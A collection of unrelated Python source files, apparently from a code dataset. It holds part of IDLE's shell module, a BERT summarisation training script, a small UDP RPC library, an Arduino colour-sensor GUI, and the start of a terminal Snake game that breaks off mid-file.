self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = '[DEBUG ON]\n>>> '
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"""Helper for ModifiedInterpreter"""
self.resetoutput()
self.executing = 1
def endexecuting(self):
"""Helper for ModifiedInterpreter"""
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"""Extend EditorWindow.close()"""
if self.executing:
response = tkMessageBox.askokcancel('Kill?', 'The program is still running!\n Do you want to kill it?', default='ok', parent=self.text)
if response is False:
return 'cancel'
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"""Extend EditorWindow._close(), shut down debugger and execution server"""
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
return
def ispythonsource(self, filename):
"""Override EditorWindow method: never remove the colorizer"""
return True
def short_title(self):
return self.shell_title
COPYRIGHT = 'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = '==== No Subprocess ===='
self.write('Python %s on %s\n%s\n%s' % (
sys.version, sys.platform, self.COPYRIGHT, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop()
finally:
self.reading = save
line = self.text.get('iomark', 'end-1c')
if len(line) == 0:
line = '\n'
if isinstance(line, unicode):
from idlelib import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ''
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare('sel.first', '!=', 'sel.last'):
return
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write('KeyboardInterrupt\n')
self.showprompt()
return 'break'
self.endoffile = 0
self.canceled = 1
if self.executing and self.interp.rpcclt:
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit()
return 'break'
def eof_callback(self, event):
if self.executing and not self.reading:
return
if not (self.text.compare('iomark', '==', 'insert') and self.text.compare('insert', '==', 'end-1c')):
return
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return 'break'
def linefeed_callback(self, event):
if self.reading:
self.text.insert('insert', '\n')
self.text.see('insert')
else:
self.newline_and_indent_event(event)
return 'break'
def enter_callback(self, event):
if self.executing and not self.reading:
return
try:
sel = self.text.get('sel.first', 'sel.last')
if sel:
if self.text.compare('sel.last', '<=', 'iomark'):
self.recall(sel, event)
return 'break'
except:
pass
if self.text.compare('insert', '<', 'iomark linestart'):
prev = self.text.tag_prevrange('stdin', 'insert')
if prev and self.text.compare('insert', '<', prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return 'break'
next = self.text.tag_nextrange('stdin', 'insert')
if next and self.text.compare('insert lineend', '>=', next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return 'break'
indices = self.text.tag_nextrange('console', 'insert linestart')
if indices and self.text.compare(indices[0], '<=', 'insert linestart'):
self.recall(self.text.get(indices[1], 'insert lineend'), event)
else:
self.recall(self.text.get('insert linestart', 'insert lineend'), event)
return 'break'
if self.text.compare('insert', '<', 'iomark'):
self.text.mark_set('insert', 'iomark')
s = self.text.get('insert', 'end-1c')
if s and not s.strip():
self.text.delete('insert', 'end-1c')
if self.text.compare('insert', '<', 'end-1c linestart'):
self.newline_and_indent_event(event)
return 'break'
self.text.mark_set('insert', 'end-1c')
if self.reading:
self.text.insert('insert', '\n')
self.text.see('insert')
else:
self.newline_and_indent_event(event)
self.text.tag_add('stdin', 'iomark', 'end-1c')
self.text.update_idletasks()
if self.reading:
self.top.quit()
else:
self.runit()
return 'break'
def recall(self, s, event):
s = re.sub('^\\s*\\n', '', s)
s = re.sub('\\n\\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove('sel', '1.0', 'end')
self.text.mark_set('insert', 'end-1c')
prefix = self.text.get('insert linestart', 'insert')
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get('insert linestart', 'insert')
self.text.insert('insert', lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search('^([ \\t]*)', lines[0]).group(0)
new_base_indent = re.search('^([ \\t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n' + line.rstrip())
finally:
self.text.see('insert')
self.text.undo_block_stop()
def runit(self):
line = self.text.get('iomark', 'end-1c')
i = len(line)
while i > 0 and line[i - 1] in ' \t':
i = i - 1
if i > 0 and line[i - 1] == '\n':
i = i - 1
while i > 0 and line[i - 1] in ' \t':
i = i - 1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror('No stack trace', 'There is no stack trace yet.\n(sys.last_traceback is not defined)', master=self.text)
return
from idlelib.StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see('iomark')
self.text.see('restart')
def restart_shell(self, event=None):
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ''
self.console.write(s)
self.text.mark_set('insert', 'end-1c')
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get('iomark', 'end-1c')
if self.history:
self.history.history_store(source)
if self.text.get('end-2c') != '\n':
self.text.insert('end-1c', '\n')
self.text.mark_set('iomark', 'end-1c')
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity('iomark', 'right')
OutputWindow.write(self, s, tags, 'iomark')
self.text.mark_gravity('iomark', 'left')
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile(object):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, lines):
for line in lines:
self.write(line)
def flush(self):
pass
def isatty(self):
return True
usage_msg = '\nUSAGE: idle [-deins] [-t title] [file]*\n idle [-dns] [-t title] (-c cmd | -r file) [arg]*\n idle [-dns] [-t title] - [arg]*\n\n -h print this help message and exit\n -n run IDLE without a subprocess (see Help/IDLE Help for details)\n\nThe following options will override the IDLE \'settings\' configuration:\n\n -e open an edit window\n -i open a shell window\n\nThe following options imply -i and will open a shell:\n\n -c cmd run the command in a shell, or\n -r file run script from file\n\n -d enable the debugger\n -s run $IDLESTARTUP or $PYTHONSTARTUP before anything else\n -t title set title of shell window\n\nA default edit window will be bypassed when -c, -r, or - are used.\n\n[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].\n\nExamples:\n\nidle\n Open an edit window or shell depending on IDLE\'s configuration.\n\nidle foo.py foobar.py\n Edit the files, also open a shell if configured to start with shell.\n\nidle -est "Baz" foo.py\n Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell\n window with the title "Baz".\n\nidle -c "import sys; print sys.argv" "foo"\n Open a shell window and run the command, passing "-c" in sys.argv[0]\n and "foo" in sys.argv[1].\n\nidle -d -s -r foo.py "Hello World"\n Open a shell window, run a startup script, enable the debugger, and\n run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in\n sys.argv[1].\n\necho "import sys; print sys.argv" | idle - "foobar"\n Open a shell window, run the script piped in, passing \'\' in sys.argv[0]\n and "foobar" in sys.argv[1].\n'
def main():
global root
global flist
global use_subprocess
use_subprocess = True
enable_shell = True
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], 'c:deihnr:st:')
except getopt.error as msg:
sys.stderr.write('Error: %s\n' % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
enable_shell = False
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print 'No script file: ', script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [
''] + args[1:]
elif cmd:
sys.argv = [
'-c'] + args
elif script:
sys.argv = [
script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if dir not in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
edit_start = idleConf.GetOption('main', 'General', 'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
root = Tk(className='Idle')
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return
if macosxSupport.runningAsOSXApp() and flist.dict:
shell.top.lower()
shell = flist.pyshell
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get('IDLESTARTUP') or os.environ.get('PYTHONSTARTUP')
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand('if 1:\n import sys as _sys\n _sys.argv = %r\n del _sys\n \n' % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
tkversionwarning = macosxSupport.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand(''.join(("print('", tkversionwarning, "')")))
root.mainloop()
root.destroy()
return
if __name__ == '__main__':
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
z_train_abstractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_transformers import BertTokenizer
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
COPY=False
if COPY:
from models.loss_copy import abs_loss
else:
from models.loss import abs_loss
from models.model_builder import Z_AbsSummarizer
from models.predictor import build_predictor
from models.z_trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'emb_size', 'enc_layers', 'enc_hidden_size', 'enc_ff_size',
'dec_layers', 'dec_hidden_size', 'dec_ff_size', 'encoder', 'ff_actv', 'use_interval']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def train_abs_multi(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_abs_single(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_abs(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
if (args.test_start_from != -1 and step < args.test_start_from):
xent_lst.append((1e6, cp))
continue
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:5]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_abs(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_abs(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = Z_AbsSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
if COPY:
valid_loss = abs_loss(model.generator, symbols, model.vocab_size, train=False, device=device, copy_generator=model.copy_generator)
else:
valid_loss = abs_loss(model.generator, symbols, model.vocab_size, train=False, device=device)
trainer = build_trainer(args, device_id, model, None, valid_loss)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = Z_AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def test_text_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = Z_AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, 'cpu',
shuffle=False, is_test=True)
trainer = build_trainer(args, '-1', None, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train_abs(args, device_id):
if (args.world_size > 1):
train_abs_multi(args)
else:
train_abs_single(args, device_id)
def train_abs_single(args, device_id):
init_logger(args.log_file)
logger.info(str(args))
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
if (args.load_from_extractive != ''):
logger.info('Loading bert from extractive model %s' % args.load_from_extractive)
bert_from_extractive = torch.load(args.load_from_extractive, map_location=lambda storage, loc: storage)
bert_from_extractive = bert_from_extractive['model']
else:
bert_from_extractive = None
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = Z_AbsSummarizer(args, device, checkpoint, bert_from_extractive)
if (args.sep_optim):
optim_bert = model_builder.build_optim_bert(args, model, checkpoint)
optim_dec = model_builder.build_optim_dec(args, model, checkpoint)
optim = [optim_bert, optim_dec]
else:
optim = [model_builder.build_optim(args, model, checkpoint)]
logger.info(model)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
if COPY:
train_loss = abs_loss(model.generator, symbols, model.vocab_size, device, train=True,
label_smoothing=args.label_smoothing, copy_generator=model.copy_generator)
else:
train_loss = abs_loss(model.generator, symbols, model.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, optim, train_loss)
trainer.train(train_iter_fct, args.train_steps)
|
srpc.py
|
from random import randint
import socket
from threading import Thread, Timer, Event
#SRPC imports
from connection import Connection
from payload import Payload, ConnectPayload
from srpcTypes import Service, Endpoint
from srpcDefs import SRPCDef, Command
class SRPC(object):
"""A simple RPC library for connecting to and offering services"""
def __init__(self, port = 0):
super(SRPC, self).__init__()
self.port = port # default to ephemeral port assigned by OS
self.sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM)
self.sock.bind(('', port)) # Bind to all interfaces on port
self.port = self.sock.getsockname()[1]
self.connectionTable = {}
self.serviceTable = {}
self.seed = randint(0, 32767)
self.counter = 1
self.stop = Event() # Thread-safe Stop event for exiting threads
self.readerThread = Thread(target=self.reader, args=(self.stop,))
self.readerThread.start()
self.cleanerThread = Timer(0.020, self.cleaner, args=(self.stop,))
self.cleanerThread.start()
def details(self):
"""Returns IP and port socket is bound to """
return self.sock.getsockname()
def close(self):
"""Close down the srpc system"""
self.stop.set() # Alert threads to stop using stop event
# Send empty packet to readerThread to break it out of blocking recv
self.sock.sendto("", self.sock.getsockname())
self.readerThread.join()
self.cleanerThread.join()
self.sock.close()
def _getNewSubport(self):
"""Private method for getting a new subport number"""
self.counter += 1
if self.counter > 32767:
self.counter = 1
return (self.seed & 0xFFFF) << 16 | self.counter
def connect(self, host, port, serviceName):
"""Connect to a service offered at host:port
Returns connection if successful,
otherwise, None
"""
address = socket.gethostbyname(host)
endpoint = Endpoint(address, port, self._getNewSubport())
connection = Connection(self.sock, endpoint, None)
self.connectionTable[endpoint] = connection
if connection.connect(serviceName):
return connection
else:
return None
def disconnect(self, connection):
"""Disconnect an existing connection, notifying the remote client"""
connection.disconnect()
self.connectionTable.pop(connection.source)
def offerService(self, serviceName):
"""Offer a service (serviceName) to other remote clients"""
service = Service(serviceName)
self.serviceTable[serviceName] = service
return service
def lookupService(self, serviceName):
"""Lookup and return an offered service, if it exists"""
return self.serviceTable.get(serviceName)
def reader(self, stop_event):
"""Reads packets from socket and updates connections
until stop_event is received
"""
while not stop_event.is_set():
data, addr = self.sock.recvfrom(SRPCDef.FRAGMENT_SIZE * 10)
if len(data) == 0:
break
payload = Payload(buffer=data)
endpoint = Endpoint(addr[0], addr[1], payload.subport)
connection = self.connectionTable.get(endpoint)
if connection is not None: #Found a valid connection record
connection.commandReceived(payload)
elif payload.command == Command.CONNECT:
payload = ConnectPayload(buffer=data)
service = self.serviceTable.get(payload.serviceName)
if service is not None:
connection = Connection(self.sock, endpoint, service)
self.connectionTable[endpoint] = connection
connection.commandReceived(payload)
#else: invalid connection + command request
def cleaner(self, stop_event):
if stop_event.is_set():
return
for endpoint in self.connectionTable.keys():
connection = self.connectionTable[endpoint]
connection.checkStatus()
if connection.isTimedOut():
self.connectionTable.pop(endpoint)
self.cleanerThread = Timer(0.020, self.cleaner, args=(self.stop,))
self.cleanerThread.start()
|
arduinoLink.py
|
import serial
import tkinter as tk
import os
from threading import Thread
from serial import *
last_received = ''
def receiving(ser):
global last_received
buffer = ''
while True:
last_received = ser.readline()
buffer += ser.read(ser.inWaiting())
if '\n' in buffer:
last_received, buffer = buffer.split('\n')[-2:]
#Create Thread
Thread(target=receiving, args=(ser,)).start()
def readColor():
#Initial Box Color
c="black"
#Initial Text Color
t="Black"
ser.flushInput()
ser.write(bytes("l","ASCII"))
x = 0
while x<1:
arduino = ser.readline().decode('ASCII')
arduino2 = ser.readline().decode('ASCII')
arduinoList = list(arduino)
arduinoList2 = list(arduino2)
arduinoData = "1"
arduinoData2 = "1"
z=0
for s in arduinoList:
if s == 'D':
z=1
if z == 1:
arduinoData2 = arduino
else:
arduinoData = arduino
q=0
for t in arduinoList2:
if t == 'D':
q=1
if q == 1:
arduinoData2 = arduino2
else:
arduinoData = arduino2
x=x+1
print(arduinoData)
rgbList = arduinoData2.split(',')
print(rgbList)
brown = "#993300"
purple = "#6a0dad"
gray = "#bebebe"
orange = "#ff6600"
pink = "#ffc0cb"
for n in rgbList:
if n=='Black Color Detected\r\n':
c="black"
t="Black"
elif n=='Blue Color Detected\r\n':
c="blue"
t="Blue"
elif n=='Red Color Detected\r\n':
c="red"
t="Red"
elif n=='Brown Color Detected\r\n':
c=brown
t="Brown"
elif n=='Purple Color Detected\r\n':
c=purple
t="Purple"
elif n=='Green Color Detected\r\n':
c="green"
t="Green"
elif n=='Gray Color Detected\r\n':
c=gray
t="Gray"
elif n=='Orange Color Detected\r\n':
c=orange
t="Orange"
elif n=='Yellow Color Detected\r\n':
c="yellow"
t="Yellow"
elif n=='Pink Color Detected\r\n':
c=pink
t="Pink"
elif n=='White Color Detected\r\n':
c="white"
t="White"
canvas.itemconfig(rec, fill= c)
canvas.itemconfig(CText, fill = c, text = t)
canvas.update
ser=serial.Serial('com9',baudrate = 9600)
win = tk.Tk()
win.title("Computer Organization and Arquitecture Honors: Color Sensor")
win.geometry("800x800+500+100")
#Set window resizable to false.
win.resizable(width=False,height=False)
#win.iconbitmap("11-Colors.ico")
win.iconphoto(False, tk.PhotoImage(file="11-Colors.png"))
canvas=tk.Canvas(win,width=1940, height=1220, bg = "blanchedalmond")
TText=canvas.create_text(400,50,fill="coral",font="helvetica 42 bold",text="Adafruit Color Sensor")
rec=canvas.create_rectangle(250, 150, 550, 450, fill="black")
CText=canvas.create_text(400,500,fill="black",font="helvetica 35 bold",text="No Color Detected")
canvas.pack(fill = tk.BOTH, expand = tk.YES)
bt1 = tk.Button(text="Detect Color",command=readColor, bg="brown", fg="white", font=("helvetica", 22, "bold"))
canvas.create_window(400, 600, window=bt1)
win.mainloop()
|
Snake.py
|
# Author: André Fonteles
# This game does not run on windows due to the lack of
# support for the curses library
import atexit
import random
import curses
import time
import threading
import os
# An IOController controls the input (keyboard) and output
# (console) of the game
class IOController():
# TODO: curses is being shared between the two threads and may
# incur in race condition. This should be fixed later
KEY_UP = curses.KEY_UP
KEY_DOWN = curses.KEY_DOWN
KEY_LEFT = curses.KEY_LEFT
KEY_RIGHT = curses.KEY_RIGHT
KEY_Q = ord('q')
KEY_A = ord('a')
def __init__(self):
self.__stdscr = curses.initscr()
curses.cbreak()
curses.noecho()
self.__stdscr.keypad(1)
self.__last_key = self.KEY_RIGHT
self.__key_lock = threading.Lock() # Create a lock to prevent race condition on __last_key
# Start thread that continuously reads user's input
thread = threading.Thread(target = self.__read_key)
thread.start()
# Outputs the game_array to the console
def print(self, game_array, score, dead):
self.__stdscr.addstr(1, len(game_array[0]) + 1, "Score:" + str(score))
for y in range(0, len(game_array)):
line = ""
for x in range(0, len(game_array[y])):
line += game_array[y][x]
self.__stdscr.addstr(y, 0, line)
# If dead, display dead message
if(dead):
msg_y = len(game_array)//2
msg_x = len(game_array[0])//4
self.__stdscr.addstr(msg_y-1, msg_x, "You are dead")
# self.__stdscr.addstr(msg_y+1, len(game_array[0]) + 1, "Press \"a\" to play again")
self.__stdscr.addstr(msg_y+2, len(game_array[0]) + 1, "Press \"q\" to quit")
self.__stdscr.refresh()
# Returns the last key pressed by the user in terms of
# the constants InOutputer.KEY_UP, InOutputer.KEY_DOWN
# InOutputer.KEY_LEFT and InOutputer.KEY_RIGHT
def get_last_key(self):
self.__key_lock.acquire()
key = self.__last_key
self.__key_lock.release()
return key
# Used in a separate thread to constantly
# update the last direction key input by
# the user
def __read_key(self):
self.__key_lock.acquire()
while(self.__last_key != self.KEY_Q): # Continue as long as key is not 'q'
self.__key_lock.release()
key = self.__stdscr.getch()
if key == curses.KEY_UP:
key = self.KEY_UP
elif key == curses.KEY_DOWN:
key = self.KEY_DOWN
elif key == curses.KEY_LEFT:
key = self.KEY_LEFT
elif key == curses.KEY_RIGHT:
key = self.KEY_RIGHT
elif key == self.KEY_Q:
key = self.KEY_Q
elif key == self.KEY_A:
key = self.KEY_A
if(key):
self.__key_lock.acquire()
self.__last_key = key
self.__key_lock.release()
self.__key_lock.acquire()
self.__key_lock.release()
# End terminal curses mode.
def close(self):
curses.endwin()
# A MazeMap represents the maze where the snake is in
class MazeMap():
BG_CHAR = "."
def __init__(self, width, height):
self.__width = width
self.__height = height
self.generate_maze()
# Generate a bidimentional array representing the maze
def generate_maze(self):
self.__maze_array = []
for y in range(0, self.__height):
self.__maze_array.append([])
for x in range(0, self.__width):
self.__maze_array[y].append(self.BG_CHAR)
return self.__maze_array
# This class is used to instantiate the snake.
class Snake:
SNAKE_CHAR = "*"
DIRECTION_UP = "top"
DIRECTION_DOWN = "down"
DIRECTION_RIGHT = "right"
DIRECTION_LEFT = "left"
def __init__(self, game_width, game_height):
self.__game_width = game_width
self.__game_height = game_height
self.__generate_snake_array()
# Configure whether the snake is dead or not
self.__dead = False
# Configure snake to start moving rightwards
self.__direction = self.DIRECTION_RIGHT
# Returns an array of points (x, y) representing the snake's body
def get_head_pos(self):
return self.__snake_array[-1]
# Returns a point (x, y) representing the head's position
def get_snake_array(self):
return self.__snake_array
# Generates an array of points (x, y) representing the snake's body
def __generate_snake_array(self):
init_size = 4
init_x = self.__game_width // 2
init_y = self.__game_height - 2
self.__snake_array = []
for x in range(init_x - init_size, init_x):
self.__snake_array.append((x, init_y))
self._potential_growth = (init_x - init_size - 1, init_y)
# Adds the snake to the game_array
def add_itself(self, game_array):
for point in self.__snake_array:
game_array[point[1]][point[0]] = self.SNAKE_CHAR
# Moves the snake towards *neighboring* point (x, y)
# Kills the snake if it hits something other than food
def move_towards(self, point):
newHead = point
# Kill the snake if it hits something other than food
self.check_survival(newHead)
if(not self.__dead):
self.__snake_array.append(newHead)
# Remove last point and add it to potential_growph.
# If the snake is fed, potential_growth is added to
